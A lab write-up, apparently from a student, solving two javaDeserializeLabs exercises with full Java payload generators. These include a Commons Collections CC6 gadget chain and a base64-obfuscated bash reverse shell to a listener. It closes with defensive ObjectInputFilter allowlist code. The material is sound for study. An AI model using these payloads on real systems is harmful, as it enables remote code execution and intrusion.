javaDeserializeLabs1,2

Introduction

Project: https://github.com/waderwu/javaDeserializeLabs

There are still areas of the material I have not covered; small goal: finish the labs before I leave campus this semester.

Lab1-basic

import com.utils.Utils;
import com.yxxx.javasec.deserialize.Calc;

import java.lang.reflect.Field;

public class Lab1 {
    public static void main(String[] args) throws Exception {
        Calc calc = new Calc();
        // The fields have no setters, so they are set through reflection
        setFieldValue(calc, "canPopCalc", true);
        setFieldValue(calc, "cmd", "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3NC4xMjgvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}");
        // Serialize and print the object as a hex string
        System.out.println(Utils.objectToHexString(calc));
    }

    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }
}

Exploitation details:

  1. The JDK version must match the target machine's
  2. The package path of the Calc class must also match the target's
  3. The field values have to be set via reflection


Lab2-ysoserial_Web

Looking at pom.xml, the commons-collections 3.2.1 component is present:

    <dependency>
        <groupId>commons-collections</groupId>
        <artifactId>commons-collections</artifactId>
        <version>3.2.1</version>
    </dependency>

Use CC6, the HashMap variant. I had already built it myself for Shiro, so I just reused it here.

package com.payload.lab2;

import com.utils.Utils;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.Map;

public class Lab2 {
    public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException {
        String command = "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3NC4xMjgvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}";
        // Harmless placeholder chain so nothing fires while the object graph is being built
        Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)};
        Transformer[] transformers = new Transformer[] {
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer("getMethod", new Class[] { String.class,
                Class[].class }, new Object[] { "getRuntime",
                new Class[0] }),
            new InvokerTransformer("invoke", new Class[] { Object.class,
                Object[].class }, new Object[] { null, new Object[0] }),
            new InvokerTransformer("exec", new Class[] { String.class },
                new String[] { command }),
            new ConstantTransformer(1),
        };
        Transformer transformerChain = new ChainedTransformer(fakeTransformers);

        Map innerMap = new HashMap();
        Map outerMap = LazyMap.decorate(innerMap, transformerChain);

        TiedMapEntry tme = new TiedMapEntry(outerMap, "keykey");

        Map expMap = new HashMap();
        // put() calls tme.hashCode(), which goes through LazyMap.get() once
        expMap.put(tme, "valuevalue");

        // Remove the key that the put() above cached in the LazyMap, otherwise
        // get() finds it on the receiving side and the chain is never invoked
        outerMap.remove("keykey");

        // Swap the real chain in only after the graph is assembled
        Field f = ChainedTransformer.class.getDeclaredField("iTransformers");
        f.setAccessible(true);
        f.set(transformerChain, transformers);

        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);

        // Framing the lab's endpoint expects before the object itself
        objectOutputStream.writeUTF("SJTU");
        objectOutputStream.writeInt(1896);
        objectOutputStream.writeObject(expMap);

        System.out.println(Utils.bytesTohexString(byteArrayOutputStream.toByteArray()));
    }
}

Details:

Pay attention to the order of objectOutputStream.writeUTF and objectOutputStream.writeInt at the end; if writeObject is placed before them, the exploit does not succeed.

Common problems encountered during serialization: https://juejin.cn/post/6844903848167866375
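The two notes above (Lab1: class name and package path must resolve identically on the receiving side; Lab2: the receiver reads the UTF string and the int before the object, so the framing order matters) both describe what ObjectInputStream does on the server. The following is an added example of the defensive counterpart, not code from the lab repository: a receiver that reads the same framing and installs a JEP 290 ObjectInputFilter allowlist before readObject(), so any class descriptor outside the expected set (the Commons Collections functors included) is rejected before it is resolved or instantiated. The tag "SJTU", the int 1896 and the class `FilteredReceiver` are assumptions for the demonstration; it requires Java 9+ for `java.io.ObjectInputFilter`.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.Map;

// Added example (not part of javaDeserializeLabs): a filtered receiver for the
// UTF / int / object framing used in Lab2.
public class FilteredReceiver {

    // Allowlist of exactly the types this endpoint legitimately expects.
    // Patterns are matched in order; "!*" rejects every class not listed before it.
    // java.lang.Number is needed because Integer's superclass descriptor is also checked.
    // maxdepth / maxrefs bound the object graph so oversized payloads fail early.
    static final ObjectInputFilter FILTER = ObjectInputFilter.Config.createFilter(
            "maxdepth=8;maxrefs=256;"
            + "java.util.HashMap;java.lang.String;java.lang.Integer;java.lang.Number;"
            + "!*");

    // Reads in the same order the sender wrote: readUTF, readInt, readObject.
    // Reading in any other order desynchronises the stream, which is why the
    // payload's writeObject cannot come first.
    static Object receive(byte[] data) throws IOException, ClassNotFoundException {
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(data))) {
            in.setObjectInputFilter(FILTER);   // must be set before readObject()
            String tag = in.readUTF();         // framing, assumed "SJTU"
            int id = in.readInt();             // framing, assumed 1896
            System.out.println("tag=" + tag + " id=" + id);
            // The filter is consulted for every class descriptor and array in the
            // stream; a rejected class raises InvalidClassException before any of
            // its code (readObject, hashCode, ...) can run.
            return in.readObject();
        }
    }

    // Produces a stream with the same framing as the Lab2 payload (constructed here).
    static byte[] frame(Object payload) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bos)) {
            out.writeUTF("SJTU");
            out.writeInt(1896);
            out.writeObject(payload);
        }
        return bos.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        // Expected input: a HashMap<String, Integer>; every class is on the allowlist.
        Map<String, Integer> ok = new HashMap<>();
        ok.put("answer", 42);
        System.out.println("accepted: " + receive(frame(ok)));

        // Constructed stream carrying a class outside the allowlist (a plain
        // ArrayList here): the filter reports REJECTED and readObject() throws,
        // which is exactly what happens to a gadget chain's first class descriptor.
        try {
            receive(frame(new ArrayList<String>()));
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The allowlist is deliberately written in terms of the handful of classes the endpoint needs rather than as a denylist of known gadget packages: a denylist has to be updated for every new chain, whereas `!*` at the end of an allowlist rejects anything unexpected by default. On Java 8 the same mechanism is available from 8u121 as `sun.misc.ObjectInputFilter`, and a process-wide default can be set with `-Djdk.serialFilter=...` without touching application code.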
